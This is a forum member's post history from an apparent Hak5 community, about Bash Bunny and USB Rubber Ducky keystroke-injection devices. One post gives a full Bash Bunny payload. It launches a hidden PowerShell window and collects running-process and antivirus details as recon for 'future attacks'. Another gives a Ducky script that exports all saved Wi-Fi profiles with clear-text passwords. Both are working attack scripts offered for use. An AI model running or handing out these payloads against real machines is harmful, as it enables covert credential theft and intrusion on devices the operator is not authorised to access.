Decoy

Active Members
  • Posts: 248
  • Joined
  • Last visited
  • Days Won: 2

Everything posted by Decoy

  1. You are just cranking out payloads. I've tested this on a Windows 10 Machine and it works pretty well so far. Great payload, Sir.
  2. Indeed, share! I just picked up one of these bad boys too: https://hakshop.com/collections/wireless-gear/products/long-range-wifi-kit
  3. No worries. I wanted to make sure people could find it. That is an excellent payload.
  4. I forgot about that. I just installed all the tools and everything when I first got the BB and never gave it much thought after that.
  5. I'm pretty sure all of those keyboards are already available for the bash bunny, and I linked it as a reference only. So you can set to any of those languages as I've shown above, using the first 2 letters from each resource.
  6. Like the hardware or the software? If they are Android phones, you can most likely root the devices, and play with some custom roms.
  7. This is a link to the Rubber Ducky resources folder: https://github.com/hak5darren/USB-Rubber-Ducky/tree/master/Encoder/resources This will show you the available keyboard layouts.
  8. If you're in the HID attack mode, you can set your keyboard like so:

         Q SET_LANGUAGE DE

     Or US, and so on, and so forth.
  9. I think you might need to update the main GitHub link on your original post.
  10. Yeah, I really didn't start playing around with or learning PowerShell until I got my Rubber Ducky. Easy to learn, and extremely effective.
  11. This is just a quick and dirty payload to return all running processes under the current user. This will return the path/filename/version, and quite a bit of other info as well. This information can be useful for planning future attacks, such as taking advantage of buffer overflows, and other various vulnerabilities to gain a more permanent foothold into a target system. It can also be useful in identifying what AV is in use on a target system.

      An example of useful process info:

          Name           : avpui
          Id             : 724
          PriorityClass  : Normal
          FileVersion    : 17.0.0.643
          Path           : C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\avpui.exe
          Company        : AO Kaspersky Lab
          CPU            : 85.875
          ProductVersion : 17.0.0.643
          Description    : Kaspersky Anti-Virus
          Product        : Kaspersky Anti-Virus

      https://github.com/DeeKoy/bashbunny-payloads/tree/master/payloads/library/ProcessInfo

          #!/bin/bash
          #
          # Title:         Process Info
          # Author:        Decoy
          # Version:       1.0
          # Category:      Recon
          # Target:        Windows XP SP3+ (Powershell)
          # Attackmodes:   HID, Storage
          #
          #
          # Amber Blink Fast.....Initialization
          # Amber................Begin
          # White Blinking.......Moving loot to mass storage
          # Blue Blinking........Syncing File System
          # Green................Finished

          # Initialization
          LED R G 100

          # Create loot directory
          mkdir -p /root/udisk/loot/ProcessInfo

          # Runs minimized powershell gathering process information for potential future attack vectors
          LED R G
          ATTACKMODE HID STORAGE
          QUACK DELAY 6000
          QUACK GUI r
          QUACK STRING "powershell -NoP -NonI -W Hidden"
          QUACK ENTER
          QUACK DELAY 1000
          QUACK STRING "\$Bunny = (gwmi win32_volume -f 'label=\"BashBunny\"' | Select-Object -ExpandProperty DriveLetter); Get-Process | Format-List -Property * | Out-File \$Bunny\\loot\\ProcessInfo\\ProcessInfo.txt; exit"
          QUACK ENTER
          LED R G B 100
          sleep 1

          # Sync File System
          LED B 100
          sync; sleep 1; sync

          # Trap is clean
          LED G
  12. I'm pretty sure the payload already exists. Check this one out: Search the forums, you'll find a lot of payloads not officially published on the Wiki. Look at some examples, try playing with it. Good luck!
  13. Doubtful. I don't think something like this can be done with network attack vectors. But someone can correct me if I'm wrong.
  14. Yes you can. You might be better off using PowerShell for it, but you'd just navigate to the ducky directory prior to running netsh.
  15. Awesome, it's definitely helpful. Thanks for creating this one for the Bunny!
  16. This actually wouldn't be a bad idea for the Ducky, LAN Turtle, and Pineapples as well.
  17. Check out this thread: https://forums.hak5.org/index.php?/topic/40581-bash-bunny-ducky-default-keyboard-language/
  18. Why not dump all the profiles? Try this instead:

          DELAY 1000
          GUI
          DELAY 200
          ENTER
          STRING cmd
          ENTER
          DELAY 600
          STRING netsh wlan export profile key=clear
          ENTER

      This will dump all profiles and clear text wifi passwords into an xml file in whatever directory you're currently in.
  19. Check out the recent Hashcat episode of Hak5, it just came out a few weeks ago. One of the Hashcat developers talked about which cards he prefers.
  20. That being said, I feel like using TABs and ARROWs can be hit or miss. It's too easy to have another process change focus, etc. I think the PowerShell line is the way to go. Another solution would be an ALT F4 combo. Good luck!
  21. I think all you should have to do is define the keyboard resource from the command line like this:

          java -jar duckencode.jar -i script.txt -o inject.bin -l resources/us.properties

      If that doesn't work, you can get the updated resources from GitHub. Let me know how it works out.